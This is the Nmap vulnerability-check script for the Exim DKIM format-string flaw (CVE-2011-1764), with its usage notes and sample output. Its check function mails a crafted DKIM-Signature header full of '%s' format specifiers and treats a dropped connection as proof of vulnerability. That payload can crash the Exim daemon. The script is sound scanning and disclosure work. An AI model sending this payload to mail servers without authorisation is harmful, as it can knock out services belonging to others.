1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
|
local shortport = require "shortport"
local smtp = require "smtp"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"
description = [[
Checks for a format string vulnerability in the Exim SMTP server
(version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support
(CVE-2011-1764). The DKIM logging mechanism did not use format string
specifiers when logging some parts of the DKIM-Signature header field.
A remote attacker who is able to send emails, can exploit this vulnerability
and execute arbitrary code with the privileges of the Exim daemon.
Reference:
* http://bugs.exim.org/show_bug.cgi?id=1106
* http://thread.gmane.org/gmane.mail.exim.devel/4946
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1764
* http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail
]]
---
-- @usage
-- nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 <host>
--
-- @output
-- PORT STATE SERVICE
-- 25/tcp open smtp
-- | smtp-vuln-cve2011-1764:
-- | VULNERABLE:
-- | Exim DKIM format string
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2011-1764 BID:47736
-- | Risk factor: High CVSSv2: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P)
-- | Description:
-- | Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified
-- | Mail (DKIM) support is vulnerable to a format string. A remote attacker
-- | who is able to send emails, can exploit this vulnerability and execute
-- | arbitrary code with the privileges of the Exim daemon.
-- | Disclosure date: 2011-04-29
-- | References:
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1764
-- | https://www.securityfocus.com/bid/47736
-- |_ http://bugs.exim.org/show_bug.cgi?id=1106
--
-- @args smtp-vuln-cve2011-1764.mailfrom Define the source email address to
-- be used.
-- @args smtp-vuln-cve2011-1764.mailto Define the destination email address
-- to be used.
author = "Djalal Harouni"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "vuln"}
portrule = function (host, port)
if port.version.product ~= nil and port.version.product ~= "Exim smtpd" then
return false
end
return shortport.port_or_service({25, 465, 587},
{"smtp", "smtps", "submission"})(host, port)
end
local function smtp_finish(socket, status, msg)
if socket then
socket:close()
end
return status, msg
end
local function get_exim_banner(response)
local banner, version
banner = response:match("%d+%s(.+)")
if banner and banner:match("Exim") then
version = tonumber(banner:match("Exim%s([0-9%.]+)"))
end
return banner, version
end
-- Sends the mail with the evil DKIM-Signatures header.
-- Returns true, true if the Exim server is vulnerable
local function check_dkim(socket, smtp_opts)
local killed = false
stdnse.debug2("checking the Exim DKIM Format String")
local status, response = smtp.mail(socket, smtp_opts.mailfrom)
if not status then
return status, response
end
status, response = smtp.recipient(socket, smtp_opts.mailto)
if not status then
return status, response
end
status, response = smtp.datasend(socket)
if not status then
return status, response
end
local message = (
string.format( "MIME-Version: 1.0\r\nFrom: <%s>\r\nTo: <%s>\r\n",
smtp_opts.mailfrom, smtp_opts.mailto)
.."Subject: Nmap Exim DKIM Format String check\r\n"
-- use a fake DKIM-Signature header.
.."DKIM-Signature: v=1; a=%s%s%s%s;"
.." c=%s%s%s%s; q=dns/txt;\r\n"
.." d=%s%s%s%s; s=%s%s%s%s;\r\n"
.." h=mime-version:from:to:subject;\r\n"
.." bh=MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTI=;\r\n"
.." b=DyE0uKynaea3Y66zkrnMaBqtYPYVXhazCKGBiZKMNywclgbj0MkREPH3t2EWByev9g=\r\n"
)
status, response = socket:send(message)
if not status then
return status, "failed to send the message."
end
status, response = smtp.query(socket, ".")
if not status then
if string.match(response, "connection closed") then
stdnse.debug2("Exim server is vulnerable to DKIM Format String")
killed = true
else
return status, "failed to terminate the message, seems NOT VULNERABLE"
end
end
return true, killed
end
-- Checks if the Exim server is vulnerable to CVE-2011-1764
local function check_exim(smtp_opts)
local smtp_server = {}
local exim_ver_min, exim_ver_max = 4.70, 4.75
local socket, ret = smtp.connect(smtp_opts.host,
smtp_opts.port,
{ssl = true,
timeout = 10000,
recv_before = true,
lines = 1})
if not socket then
return smtp_finish(nil, socket, ret)
end
smtp_server.banner, smtp_server.version = get_exim_banner(ret)
if not smtp_server.banner then
return smtp_finish(socket, false,
'failed to read the SMTP banner.')
elseif not smtp_server.banner:match("Exim") then
return smtp_finish(socket, false,
'not a Exim server: NOT VULNERABLE')
end
local vuln = smtp_opts.vuln
vuln.extra_info = {}
if smtp_server.version then
if smtp_server.version <= exim_ver_max and
smtp_server.version >= exim_ver_min then
vuln.state = vulns.STATE.LIKELY_VULN
table.insert(vuln.extra_info,
string.format("Exim version: %.02f", smtp_server.version))
else
vuln.state = vulns.STATE.NOT_VULN
return smtp_finish(socket, true)
end
end
local status, response = smtp.ehlo(socket, smtp_opts.domain)
if not status then
return smtp_finish(socket, status, response)
end
-- set the appropriate 'MAIL FROM' and 'RCPT TO' values
if not smtp_opts.mailfrom then
smtp_opts.mailfrom = string.format("root@%s", smtp_opts.domain)
end
if not smtp_opts.mailto then
smtp_opts.mailto = string.format("postmaster@%s",
smtp_opts.host.targetname and
smtp_opts.host.targetname or 'localhost')
end
status, ret = check_dkim(socket, smtp_opts)
if not status then
return smtp_finish(socket, status, ret)
elseif ret then
vuln.state = vulns.STATE.VULN
elseif not vuln.state then
vuln.state = vulns.STATE.NOT_VULN
end
return smtp_finish(socket, true)
end
action = function(host, port)
local smtp_opts = {
host = host,
port = port,
domain = stdnse.get_script_args('smtp.domain') or
'nmap.scanme.org',
mailfrom = stdnse.get_script_args('smtp-vuln-cve2011-1764.mailfrom'),
mailto = stdnse.get_script_args('smtp-vuln-cve2011-1764.mailto'),
vuln = {
title = 'Exim DKIM format string',
IDS = {CVE = 'CVE-2011-1764', BID = '47736'},
risk_factor = "High",
scores = {
CVSSv2 = "7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P)",
},
description = [[
Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified
Mail (DKIM) support is vulnerable to a format string. A remote attacker
who is able to send emails, can exploit this vulnerability and execute
arbitrary code with the privileges of the Exim daemon.]],
references = {
'http://bugs.exim.org/show_bug.cgi?id=1106',
},
dates = {
disclosure = {year = '2011', month = '04', day = '29'},
},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local status, err = check_exim(smtp_opts)
if not status then
stdnse.debug1("%s", err)
return nil
end
return report:make_output(smtp_opts.vuln)
end
|